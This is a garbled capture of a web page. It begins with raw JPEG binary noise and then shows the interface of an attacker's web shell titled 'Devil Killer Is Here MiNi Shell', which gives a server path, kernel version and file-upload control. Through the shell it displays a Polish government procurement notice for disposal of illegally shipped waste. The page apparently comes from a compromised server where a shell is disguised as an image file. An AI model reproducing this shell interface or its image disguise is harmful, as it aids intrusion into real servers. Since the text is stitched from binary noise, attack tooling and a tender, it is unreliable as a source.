JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250926/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250926/0044507201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zagospodarowanie odpadów pochodzących z nielegalnego międzynarodowego przemieszczania dla 9 lokalizacji </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Inspektorat Ochrony Środowiska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000861593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bitwy Warszawskiej 1920 roku nr 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-362</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p.winnicki@gios.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gov.pl/gios</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodarowanie odpadów pochodzących z nielegalnego międzynarodowego przemieszczania dla 9 lokalizacji </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2f2057ab-aa35-46d0-aabf-ee7c8f9c5b01</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00445072</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00158566/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Zagospodarowanie odpadów pochodzących z nielegalnego międzynarodowego przemieszczania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-gios.ezamawiajacy.pl. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy zakupowej zamawiającego pod adresem: https://zamowienia-<br/>gios.ezamawiajacy.pl.<br/>2. Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dladokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452)<br/>3. Dokumentacja niniejszego postępowania została opublikowana na platformie zakupowej. W celu zapoznania się z dokumentacją postępowania Wykonawca po przejściu na dedykowany adres platformy zakupowej:<br/>- do upływu terminu składania ofert przechodzi do zakładki „Lista ogłoszonych postępowań”, wybiera zakładkę „Aktualne” i wyszukuje przedmiotowe postępowanie,<br/>Pozostała treść w wymaganiach technicznych i organizacyjnych w niniejszym ogłoszeniu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">- po upływie terminu składania ofert przechodzi do zakładki „Lista ogłoszonych<br/>postępowań”, wybiera zakładkę „Archiwalne” i wyszukuje przedmiotowe<br/>postępowanie.<br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego<br/>tj. bezpłatnie rejestrując się lub, w przypadku posiadania konta w platformie<br/>zakupowej, logując się, akceptuje regulamin zamieszczony na stronie internetowej:<br/>https://oneplace.marketplanet.pl/regulamin oraz warunki korzystania z platformy<br/>zakupowej wynikające z Instrukcji korzystania z platformy zakupowej Wykonawcy<br/>(Instrukcja użytkownika). Instrukcja dostępna jest pod adresem:<br/>https://zamowienia-<br/>gios.ezamawiajacy.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFile<br/>sList&amp;clientName=gios&amp;USER_MENU_HOVER=publicFilesList<br/>W celu wejścia na platformę zakupową umożliwiającą m.in. zapoznanie się z treścią<br/>SIWZ, złożenie oferty, wymagane jest uprzednie zalogowanie. Wykonawcy, którzy nie<br/>założyli konta, zobligowani są do uprzedniej, bezpłatnej rejestracji. Szczegóły<br/>rejestracji wskazane są w Instrukcji korzystania z platformy zakupowej. Proces<br/>rejestracji trwa maksymalnie do 2 dni roboczych. Zamawiający zaleca więc<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia<br/>oferty w postaci elektronicznej.<br/>Ważne – oferta zapisana na platformie zakupowej nie oznacza, że została ona<br/>złożona. Zapisanie oferty daje użytkownikowi czas, na wprowadzenie<br/>ewentualnych poprawek, uzupełnień, dołączenie dodatkowych załączników.<br/>Dopiero wybór ikony ZŁÓŻ OFERTĘ/WNIOSEK oznacza złożenie oferty/wniosku<br/>zgodnie z przepisami ustawy Pzp.<br/>5. W prowadzonym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia<br/>oraz informacje Zamawiający i Wykonawcy przekazują za pomocą platformy<br/>zakupowej pod adresem: https://zamowienia-gios.ezamawiajacy.pl.<br/>6. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SIWZ<br/>za pośrednictwem platformy zakupowej. Treść zapytań wraz z wyjaśnieniami treści<br/>SIWZ będzie zamieszczana na stronie internetowej Zamawiającego za<br/>pośrednictwem platformy zakupowej pod adresem: https://zamowienia-<br/>gios.ezamawiajacy.pl.<br/>7. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do<br/>Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść<br/>dotrze do Zamawiającego przed upływem tego terminu (wczytanie na platformie<br/>zakupowej).<br/>8. Za datę wpływu oferty, oświadczeń wniosków, zawiadomień oraz informacji<br/>przekazywanych przez Wykonawcę i Zamawiającego przyjmuje się datę i godzinę<br/>wczytania na platformie zakupowej. 9. Jeśli w niniejszej Specyfikacji Istotnych Warunków Zamówienia jest mowa o<br/>opatrzeniu / podpisaniu dokumentu / oświadczenia kwalifikowanym podpisem<br/>elektronicznym, Zamawiający wymaga, aby kwalifikowany podpis elektroniczny<br/>wystawiony był przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem<br/>świadczącym usługi certyfikowane – podpis elektroniczny, spełniające wymogi<br/>bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o usługach zaufania<br/>oraz identyfikacji elektronicznej (Dz. U. z 2024 r. poz. 442). Szczegółowe informacje<br/>o sposobie pozyskania usługi kwalifikowanego podpisu elektronicznego oraz<br/>warunkach jej użycia można znaleźć na stronach internetowych kwalifikowanych<br/>dostawców usług zaufania, których lista znajduje się pod adresem internetowym<br/>http://www.nccert.pl.<br/>10. Zamawiający dopuszcza w szczególności następujące formaty danych, dokumentów<br/>i oświadczeń: doc, docx, pdf, xml.1, podpisane kwalifikowalnym podpisem<br/>elektronicznym.<br/>11. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji<br/>wynosi 75 MB.<br/>POZOSTAŁA TREŚĆ W SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">I. Klauzula informacyjna dotycząca przetwarzania danych osobowych przez Główny<br/>Inspektorat Ochrony Środowiska w celu wyboru najkorzystniejszej oferty<br/>Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych- RODO),<br/>(Dz. U. UE. L. z 2016 r. Nr 119, str. 1 z późn. zm.), podajemy następujące informacje:<br/>1. Administratorem Pani/Pana danych osobowych jest Główny Inspektor Ochrony<br/>Środowiska z siedzibą w Warszawie, z którym może się Pani/Pan kontaktować<br/>w następujący sposób:<br/> listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy<br/>Warszawskiej 1920 r. 3;<br/> Elektroniczna Skrzynka Podawcza ePUAP: /gios/SkrytkaESP<br/> telefonicznie na nr 22 577 53 80;<br/> e-mail: gios@gios.gov.pl<br/> adres do doręczeń elektronicznych AE:PL-67072-24050-IURUS-21.<br/>2. Główny Inspektor Ochrony Środowiska wyznaczył Inspektora Ochrony Danych do<br/>kontaktu w sprawach dotyczących przetwarzania danych osobowych oraz realizacji<br/>praw związanych z przetwarzaniem danych, z którym można kontaktować się:<br/> listownie na adres siedziby administratora: 02-362 Warszawa, ul. Bitwy Warszawskiej 1920 r. 3;<br/> telefonicznie na nr 22 577 53 75;<br/> e-mail: iod@gios.gov.pl<br/>3. Podstawą prawną przetwarzania Pani/Pana danych osobowych w szczególności jest:<br/> art. 6 ust. 1 lit. b) RODO t j. przetwarzanie jest niezbędne w celu zawarcia i realizacji<br/>umowy oraz art. 6 ust. 1 lit. c) RODO tj. przetwarzanie jest niezbędne do<br/>wypełnienia obowiązku prawnego ciążącego na administratorze,<br/> ustawa z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz. U. z 2019 r.<br/>poz. 1781),<br/> ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U.<br/>z 2024 r. poz. 1320), zwana dalej „ustawą Prawo zamówień publicznych”,<br/> ustawa z dnia 27 sierpnia 2009 r. o finansach publicznych (t.j. Dz. U. z 2024 r.<br/>poz. 1530),<br/> ustawa z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120,<br/>z późn. zm.),<br/> ustawa z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz. U. z 2024 r. poz. 1061,<br/>z późn. zm.).<br/>4. Pani/Pana dane osobowe będą przetwarzane w celu wyboru najkorzystniejszej oferty<br/>w postępowaniu prowadzonym na podstawie przepisów ustawy Prawo zamówień<br/>publicznych.<br/>5. Odbiorcą Pani/Pana danych osobowych mogą być podmioty upoważnione do<br/>przetwarzania danych osobowych na podstawie przepisów prawa powszechnie<br/>obowiązującego, w tym osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień<br/>publicznych. Dodatkowo informacje związane z postępowaniem są zamieszczane na<br/>platformie Marketplanet. W uzasadnionych przypadkach dane osobowe zostaną<br/>przekazane podmiotom, z którymi administrator zawarł umowę powierzenia<br/>przetwarzania danych osobowych w szczególności podmiotom świadczącym usługi w<br/>zakresie systemów informatycznych/ oprogramowania.<br/>6. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do wykonania<br/>Umowy, celów przetwarzania danych osobowych, dochodzenia roszczeń, obrony<br/>przez roszczeniami oraz wykonania zadań wynikających z ustaw szczególnych, w tym<br/>ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U.<br/>z 2020 r. poz. 164, z późn. zm.).<br/>7. Przysługuje Pani/Panu prawo do żądania od administratora: dostępu do danych<br/>osobowych, sprostowania oraz ograniczenia przetwarzania, jeśli nie będą zachodziły<br/>przeciwskazania prawne.<br/>8. W przypadku gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza<br/>przepisy RODO ma Pani/Pan prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych.<br/>POZOSTAŁA TREŚĆ W SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że:<br/>a) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące<br/>wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu<br/>na ich wniesienie;<br/>b) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich<br/>danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych<br/>osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych<br/>oraz przetwarzania danych genetycznych, danych biometrycznych w celu<br/>jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia,<br/>seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o<br/>udzielenie zamówienia;<br/>c) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez<br/>Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych<br/>z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia<br/>poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO,<br/>związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od<br/>administratora kopii danych osobowych podlegających przetwarzaniu), Zamawiający<br/>może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia;<br/>d) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o<br/>którym mowa w art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych<br/>osobowych), nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników;<br/>e) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania;<br/>f) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18<br/>ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w<br/>protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych,<br/>chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia<br/>2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG-WZP.26.1.59.2025.PW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 185061,69 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zgodnie ze szczegółowym opisem przedmiotu zamówienia w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-08</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny oferty:<br/>a) Punkty przyznane za kryterium „Cena oferty brutto” liczone będą wg<br/>następującego wzoru:<br/>C = (Cn : Cb) × 0,5 x 100 = X pkt<br/>gdzie:<br/>C - liczba punktów, jakie uzyskała dana oferta w kryterium cena,<br/>CN - najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CB - cena oferty badanej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 5 pkt.<br/>b) Punkty przyznane za kryterium „Zadeklarowany sposób zagospodarowania<br/>odpadów” liczone będą wg następującego wzoru:<br/>gdzie:<br/>UOdzysk - udział masy odpadów przewidzianych do zagospodarowania metodą<br/>odzysku w całkowitej masie odpadów (nie może być mniejszy od 0,8), podany<br/>jako ułamek dziesiętny.<br/>Minimalny wymagany przez Zamawiającego udział masy odpadów<br/>przewidzianych do zagospodarowania metodą odzysku wynosi 80% - 0,8 jako<br/>ułamek dziesiętny.<br/>W kryterium „Zadeklarowany sposób zagospodarowania odpadów”<br/>Zamawiający dokona oceny na podstawie zadeklarowanego sposobu<br/>zagospodarowania odpadów wskazanego przez Wykonawcę w formularzu<br/>ofertowym.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 50 pkt 3. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów<br/>obliczonych w oparciu o ustalone kryteria.<br/>4. Ocenie będą podlegały wyłącznie oferty niepodlegające odrzuceniu.<br/>5. Ocena będzie dokonana z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami arytmetyki.<br/>6. Zamawiający zsumuje punkty za poszczególne kryteria.<br/>7. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyskała największą<br/>liczbę<br/>8. punktów.<br/>9. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień<br/>dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/><br/>Wzór kryterium nr 2 w SWZ. Proszę się zapoznać.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zadeklarowany sposób zagospodarowania odpadów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek nr 1:<br/>Wykonawca posiada stosownie do wykonywanych bezpośrednio<br/>(bez udziału podwykonawców) zadań co najmniej jedno z<br/>uprawnień:<br/>a) uprawnienie do prowadzenia działalności w zakresie<br/>transportu odpadów objętych przedmiotem zamówienia, tj.<br/>aktualny wpis do rejestru bazy danych o produktach i<br/>opakowaniach oraz o gospodarce odpadami, tzw. BDO w<br/>zakresie transportu odpadów zgodnie z art. 50 ust. 1 pkt 5<br/>lit. b ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z<br/>2023 r. poz. 1587, z późn. zm.). Wpis do rejestru musi<br/>obejmować odpady będące przedmiotem zamówienia<br/>b) uprawnienie do zbierania odpadów, tj. aktualne zezwolenie<br/>na zbieranie odpadów, z uwzględnieniem odpadów objętych<br/>przedmiotem zamówienia, wydane na podstawie art. 41 ust c) uprawnienie do przetwarzania odpadów, tj. aktualne<br/>zezwolenie na przetwarzanie 